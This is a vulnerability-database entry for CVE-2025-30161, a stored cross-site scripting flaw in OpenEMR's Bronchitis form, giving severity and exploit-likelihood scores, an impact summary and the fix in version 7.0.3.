Cyber Resilience

CVE-2025-30161

HighPublic PoC

Published: 31 March 2025

Published
31 March 2025
Modified
13 May 2025
KEV Added
Patch
CVSS Score v4 8.4 CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:A/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
EPSS Score 0.0688 91.6th percentile
Risk Priority 21 60% EPSS · 20% KEV · 20% CVSS

Summary

CVE-2025-30161 is a high-severity Basic XSS (CWE-80) vulnerability in Open-Emr Openemr. Its CVSS base score is 8.4 (High).

Operationally, ranked in the top 8.4% of CVEs by exploit likelihood; it is not currently listed in the CISA KEV catalog; a public proof-of-concept is referenced.

Deeper analysis

OpenEMR is a free and open source electronic health records and medical practice management application. CVE-2025-30161 is a stored cross-site scripting vulnerability (CWE-80) in the Bronchitis form component that permits an authenticated user with form-editing rights to inject persistent scripts. The flaw resides in the view.php handling of bronchitis form data and carries a CVSS 4.0 score of 8.4.

An attacker able to edit a bronchitis form can store malicious JavaScript that executes in the browser of any administrator who later views the record, enabling theft of administrator credentials and subsequent account takeover. No special network position or user interaction beyond normal form viewing is required once the payload is persisted.

The vulnerability is fixed in OpenEMR 7.0.3, as stated in the project’s GitHub Security Advisory GHSA-59rv-645x-rg6p and the corresponding code changes that neutralize the unsanitized output.

The EPSS probability rose from a low baseline to a peak of 0.1372 on 2026-05-12 before receding to the current value of 0.0688, indicating that exploitation interest emerged after public disclosure.

EU & UK References

Vulnerability details

OpenEMR is a free and open source electronic health records and medical practice management application. A stored XSS vulnerability in the Bronchitis form component of OpenEMR allows anyone who is able to edit a bronchitis form to steal credentials from…

more

administrators. This vulnerability is fixed in 7.0.3.

CWE(s)

Related Threats

No named actor attribution yet. ATT&CK technique mapping in progress for this CVE.

Affected Assets

open-emr
openemr
≤ 7.0.3

Mitigating Controls

No mitigating controls mapped yet. The per-CVE control annotator has not reached this CVE.

References